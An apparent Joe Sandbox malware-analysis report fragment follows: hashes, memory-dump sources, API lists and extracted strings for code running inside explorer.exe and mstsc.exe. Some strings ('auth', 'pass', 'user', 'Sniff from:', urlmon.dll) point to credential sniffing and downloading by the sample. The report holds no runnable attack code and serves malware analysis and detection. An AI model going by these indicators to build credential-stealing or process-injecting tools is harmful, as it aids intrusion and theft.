                                                                                                              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                              • Instruction ID: 3ae08187caaa4a0096b5e46610acd3e3a785ed1699aee986889546914a198a2c
                                                                                                              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                              • Instruction Fuzzy Hash: 29416F30A19E0D8FCB54EF58A0957ED73E5FB6C300F44056AA80AD7280DA70ED50CBCA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .dll$el32$h$kern
                                                                                                              • API String ID: 0-4264704552
                                                                                                              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                              • Instruction ID: f059a01df45cc2178a425fb270aeaf7d52f31b560959539fe24ddbef18e15820
                                                                                                              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                              • Instruction Fuzzy Hash: 62418F70608B488FDB69DF2880983AAB7E1FBD8301F144A2ED59EC3265DB70C945CB85
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                              • API String ID: 0-3434893486
                                                                                                              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                              • Instruction ID: c0fedf32403be37ea46317f9f83b94546640c7cd1993eeae088c190a1d42db88
                                                                                                              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                              • Instruction Fuzzy Hash: 7531063151CB485FC71AEB28D4846DAB7D0FB98300F504D1EE49BC7292EE30A94ACB47
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $Snif$f fr$om:
                                                                                                              • API String ID: 0-3434893486
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                              • API String ID: 0-3136806129
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .dll$chro$hild$me_c
                                                                                                              • API String ID: 0-3136806129
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                              • API String ID: 0-319646191
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                              • API String ID: 0-319646191
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .$l$l$t
                                                                                                              • API String ID: 0-168566397
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .$l$l$t
                                                                                                              • API String ID: 0-168566397
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823481007.000000000E990000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_e990000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: auth$logi$pass$user
                                                                                                              • API String ID: 0-2393853802

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:0%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:24
                                                                                                              Total number of Limit Nodes:3

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 10 4bb2ca0-4bb2cac LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 9 4bb2c70-4bb2c7c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 8 4bb2c60-4bb2c6c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 13 4bb2df0-4bb2dfc LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

Control-flow Graph
• Block 4bb2dd0-4bb2ddc: LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a80cdb65a26bd20ad5557b1619d806fb7eab432669fe21c45c9b9e26bd430d3b
• Instruction ID: 5c11dd8bf3375c5c92604ff07889530391d845cfc13d4ed27af2225c07365aa0
• Opcode Fuzzy Hash: a80cdb65a26bd20ad5557b1619d806fb7eab432669fe21c45c9b9e26bd430d3b
• Instruction Fuzzy Hash: 29900222242441527545B15944445074006DBE0246795C056B1815951C8527E957D621

Control-flow Graph
• Block 4bb35c0-4bb35cc: LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c62e8108c49920d7eebfb667f8cb3f46bedf9c34c8ac244f5c41a7c95f25597d
• Instruction ID: 978233556863168cfab8ab09d7859f4bd39efe9ac5458393e2d3fb72496f6949
• Opcode Fuzzy Hash: c62e8108c49920d7eebfb667f8cb3f46bedf9c34c8ac244f5c41a7c95f25597d
• Instruction Fuzzy Hash: 2490023260550402F100715945547061005CBD0206F65C455B0825569D8796DA5265A2

Control-flow Graph
• Block 4bb2d10-4bb2d1c: LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 96ebfdead76b8afb84c62a5b7f493457e76f29d7f84a01019e6db7c66a644093
• Instruction ID: b4568b6d7efd2003d1c94ad24b09464dc575bbff13fdfa87d143de6611dc15b5
• Opcode Fuzzy Hash: 96ebfdead76b8afb84c62a5b7f493457e76f29d7f84a01019e6db7c66a644093
• Instruction Fuzzy Hash: 9B90022A21340002F1807159544860A0005CBD1207F95D459B0416559CC916D96A5321

Control-flow Graph
• Block 4bb2ea0-4bb2eac: LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: f938955935c1dcb8a13b729a15cdb7fbe4f791e2b2042c7512c08d691a72329c
• Instruction ID: afacfacf4379239c15562f203afc51737ddccdf434a07a6123e635368f4532a7
• Opcode Fuzzy Hash: f938955935c1dcb8a13b729a15cdb7fbe4f791e2b2042c7512c08d691a72329c
• Instruction Fuzzy Hash: 2B90027220140402F140715944447460005CBD0306F55C055B5465555E865ADED66665

Control-flow Graph
• Block 4bb2fe0-4bb2fec: LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 8cdf2afe6261208467a5082d62d9a49345a4dbeef5d3ce5a0ea76f03a5dcb415
• Instruction ID: 9073e522700ccb5ef3e230e9433c02f0f91ac53d4513890422ebee1854b5bc11
• Opcode Fuzzy Hash: 8cdf2afe6261208467a5082d62d9a49345a4dbeef5d3ce5a0ea76f03a5dcb415
• Instruction Fuzzy Hash: D2900222211C0042F20075694C54B070005CBD0307F55C159B0555555CC916D9625521

Control-flow Graph
• Block 4bb2f30-4bb2f3c: LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c23d69e2c18a196a7b6138b39c2d8f4b2c48a301a6d22b9b11a9dacc76267f6e
• Instruction ID: e869f75edb9196141ff962fefaeac7c76fd8f74f702ee236f51e07c66858da4d
• Opcode Fuzzy Hash: c23d69e2c18a196a7b6138b39c2d8f4b2c48a301a6d22b9b11a9dacc76267f6e
• Instruction Fuzzy Hash: E690026234140442F10071594454B060005CBE1306F55C059F1465555D861ADD536126

Control-flow Graph
• Block 4bb2ad0-4bb2adc: LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: f501a956e576c631e69b1cccaed36f2b205c948b0af1638eb2e2cf90c11779f0
• Instruction ID: 63dd7a7dd45a34edcea541188d50320671919f631b49f9a3e8b4b5a42371b83d
• Opcode Fuzzy Hash: f501a956e576c631e69b1cccaed36f2b205c948b0af1638eb2e2cf90c11779f0
• Instruction Fuzzy Hash: B7900226211400032105B55907445070046CBD5356355C065F1416551CD622D9625121

Control-flow Graph
• Block 4bb2bf0-4bb2bfc: LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a624d791e8f2f11df80ffacb937cdd8d1891582ce2183e7e3ab2280b58b4fbfd
• Instruction ID: 29b1b5c4cc9ec08c622ab69677b13efb563721dd58366d4715035a020ec2a879
• Opcode Fuzzy Hash: a624d791e8f2f11df80ffacb937cdd8d1891582ce2183e7e3ab2280b58b4fbfd
• Instruction Fuzzy Hash: 4B90023220140802F1807159444464A0005CBD1306F95C059B0426655DCA16DB5A77A1

Control-flow Graph
• Block 4bb2be0-4bb2bec: LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 0207011b0167ad1795be089b5048ef89fc41541891575aa8ad0b74d098844a7f
• Instruction ID: 518e4b2efdbaea1bf7dcc0a4961e2c8198580a5f03bf3cf0f735d6d50f1b8762
• Opcode Fuzzy Hash: 0207011b0167ad1795be089b5048ef89fc41541891575aa8ad0b74d098844a7f
• Instruction Fuzzy Hash: A290023220544842F14071594444A460015CBD030AF55C055B0465695D9626DE56B661

Control-flow Graph
• Block 4bb2b60-4bb2b6c: LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
• Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b21e8efad66c756346697c681541e03d122baecf83a2d84f4483872c5e41af1c
• Instruction ID: 79b4d8a1e9b92757fbe39af7102d384820983f128f22a1296641ae45a1a50bc1
• Opcode Fuzzy Hash: b21e8efad66c756346697c681541e03d122baecf83a2d84f4483872c5e41af1c
• Instruction Fuzzy Hash: B590026220240003610571594454616400ACBE0206B55C065F1415591DC526D9926125

                                                                                                              Control-flow Graph (rendered graph omitted; basic blocks and edges recovered from the graph data)
                                                                                                              • Block 0: 4bb2c0a-4bb2c0f
                                                                                                              • Block 1: 4bb2c1f-4bb2c26, calls LdrInitializeThunk (edge 0->1)
                                                                                                              • Block 2: 4bb2c11-4bb2c18 (edge 0->2)
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 6d036684a4274a699de0a5c3b2fc7c1eed2e75d9f355aa57121679de3d8dcbe3
                                                                                                              • Instruction ID: 138177fb78f1a7f15d5864caec9ab8e92f38ec1cdf0dc3e3e7436a0a700394d1
                                                                                                              • Opcode Fuzzy Hash: 6d036684a4274a699de0a5c3b2fc7c1eed2e75d9f355aa57121679de3d8dcbe3
                                                                                                              • Instruction Fuzzy Hash: 94B09B729015C5C5FB15F760460C7177A00EBD0706F15C0E5E2430642E4779D5D1E1B5
                                                                                                              APIs
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 007A6181
                                                                                                              • SetCursor.USER32(00000000), ref: 007A6188
                                                                                                              • IsIconic.USER32(?), ref: 007A6538
                                                                                                                • Part of subcall function 007A0150: IsIconic.USER32(?), ref: 007A0196
                                                                                                                • Part of subcall function 007A0150: GetWindowPlacement.USER32(?,?), ref: 007A01A7
                                                                                                                • Part of subcall function 007A0150: GetLastError.KERNEL32 ref: 007A01B1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CursorIconic$ErrorLastLoadPlacementWindow
                                                                                                              • String ID: FALSE$SyncSessionDisplaySettings failed$TRUE$e$get_RemoteMonitorCount failed!$mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6
                                                                                                              • API String ID: 407897081-334542998
                                                                                                              • Opcode ID: 94af2566f4f3c6996e3c4825045e6860409ab8cbf8600919489b723132d35af7
                                                                                                              • Instruction ID: e764dc13c30fd646e0224355793ae9b38a1ea9be9273b9225b0acd5563653406
                                                                                                              • Opcode Fuzzy Hash: 94af2566f4f3c6996e3c4825045e6860409ab8cbf8600919489b723132d35af7
                                                                                                              • Instruction Fuzzy Hash: 0E22B671300201DFDF1D9F68C899A7A7A92BBCA304F18462DF542972A2DB3DDC51DB92
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,?,00000000), ref: 007E8080
                                                                                                              • GetLastError.KERNEL32 ref: 007E808A
                                                                                                              • wcsrchr.MSVCRT ref: 007E80F3
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 007E8199
                                                                                                              • SysAllocString.OLEAUT32(TCP), ref: 007E826F
                                                                                                              • CoCreateInstance.OLE32(0077983C,00000000,00000001,00782EF4,00000000), ref: 007E82CF
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 007E820C
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocModuleString$AddressCreateCurrentErrorFileFreeHandleInstanceLastLibraryMessageNameProcProcessTracewcsrchr
                                                                                                              • String ID: %s(%d)#RDPENC$Failed to create the map string$TCP
                                                                                                              • API String ID: 3585024546-1016363542
                                                                                                              • Opcode ID: 3cc1121a1938e28f75ff63262658ac795a6a6c73ffb6cc109348fef9ec409057
                                                                                                              • Instruction ID: 7e202baabf53ceb04148b9928d2185df6d49f560c9ef4d999efdfab239eeca49
                                                                                                              • Opcode Fuzzy Hash: 3cc1121a1938e28f75ff63262658ac795a6a6c73ffb6cc109348fef9ec409057
                                                                                                              • Instruction Fuzzy Hash: 30913532241350AFDB699F299C49F2A3B55BB08B20F280499F909DB1E2DE3CDC41CB56
                                                                                                              APIs
                                                                                                              • IsIconic.USER32(?), ref: 007A0196
                                                                                                              • GetWindowPlacement.USER32(?,?), ref: 007A01A7
                                                                                                              • GetLastError.KERNEL32 ref: 007A01B1
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              • IsZoomed.USER32(?), ref: 007A02BA
                                                                                                              • SetWindowPlacement.USER32(?,?), ref: 007A02FE
                                                                                                              • GetLastError.KERNEL32 ref: 007A0308
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000216), ref: 007A0376
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000205), ref: 007A0461
                                                                                                              • GetClientRect.USER32(?,?), ref: 007A04F8
                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 007A0526
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ErrorLastPlacement$AddressClientFreeHandleIconicLibraryMessageModuleMoveProcRectTraceZoomed
                                                                                                              • String ID:
                                                                                                              • API String ID: 1784869082-0
                                                                                                              • Opcode ID: f6f08e4f9362c72626c74289280da7dd8bd46c17568d210b56ae0215b5077d08
                                                                                                              • Instruction ID: ae35df9b593accd85cc7a3ce24edcc6abf3282e66983b89b2d984c217870de1e
                                                                                                              • Opcode Fuzzy Hash: f6f08e4f9362c72626c74289280da7dd8bd46c17568d210b56ae0215b5077d08
                                                                                                              • Instruction Fuzzy Hash: 6CC1BF31A00204DFDF18DFA4DC89F6E7B66FF8A310F244569E9059B2A2DB79D851CB90
                                                                                                              APIs
